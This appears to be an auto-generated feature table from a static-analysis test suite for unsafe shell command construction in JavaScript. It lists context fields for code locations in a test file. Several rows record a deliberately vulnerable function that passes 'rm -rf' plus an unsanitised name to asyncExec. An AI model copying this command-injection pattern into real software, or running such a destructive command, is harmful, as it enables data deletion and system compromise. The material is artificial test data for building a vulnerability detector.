autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:445:7:445:13 | myFuncs | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:445:7:445:13 | myFuncs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:445:7:445:13 | myFuncs | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:445:7:449:1 | myFuncs | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:445:7:449:1 | myFuncs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:445:7:449:1 | myFuncs | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:445:7:449:1 | myFuncs ... OK\\n\\t}\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:445:7:449:1 | myFuncs ... OK\\n\\t}\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:445:7:449:1 | myFuncs ... OK\\n\\t}\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:445:17:449:1 | {\\n\\tmyFu ... OK\\n\\t}\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:445:17:449:1 | {\\n\\tmyFu ... OK\\n\\t}\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:445:17:449:1 | {\\n\\tmyFu ... OK\\n\\t}\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:2:446:7 | myFunc | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:2:446:7 | myFunc | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:2:446:7 | myFunc | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:2:448:2 | myFunc: ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:2:448:2 | myFunc: ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:2:448:2 | myFunc: ... T OK\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:2:448:2 | myFunc: ... T OK\\n\\t} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:2:448:2 | myFunc: ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:2:448:2 | myFunc: ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:446:9 | asyncExec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:446:9 | asyncExec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:446:9 | asyncExec | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:446:9 | asyncExec | enclosingFunctionName | myFunc | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:446:9 | asyncExec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:446:9 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:446:9 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:446:9 | this | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:446:9 | this | enclosingFunctionName | myFunc | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:446:9 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | 'arguments' object of method myFunc | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | 'arguments' object of method myFunc | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | 'arguments' object of method myFunc | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | 'arguments' object of method myFunc | enclosingFunctionName | myFunc | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | 'arguments' object of method myFunc | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | exceptional return of method myFunc | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | exceptional return of method myFunc | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | exceptional return of method myFunc | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | exceptional return of method myFunc | enclosingFunctionName | myFunc | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | exceptional return of method myFunc | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | functio ... T OK\\n\\t} | assignedToPropName | myFunc | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | functio ... T OK\\n\\t} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | functio ... T OK\\n\\t} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | functio ... T OK\\n\\t} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | return of method myFunc | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | return of method myFunc | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | return of method myFunc | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | return of method myFunc | enclosingFunctionName | myFunc | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:10:448:2 | return of method myFunc | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:20:446:23 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:20:446:23 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:20:446:23 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:20:446:23 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:20:446:23 | name | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:20:446:23 | name | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:20:446:23 | name | enclosingFunctionName | myFunc | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:20:446:23 | name | enclosingFunctionName | myFunc | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:20:446:23 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:446:20:446:23 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:11 | asyncExec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:11 | asyncExec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:11 | asyncExec | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:11 | asyncExec | enclosingFunctionName | myFunc | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:11 | asyncExec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:447:3:447:29 | asyncEx ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 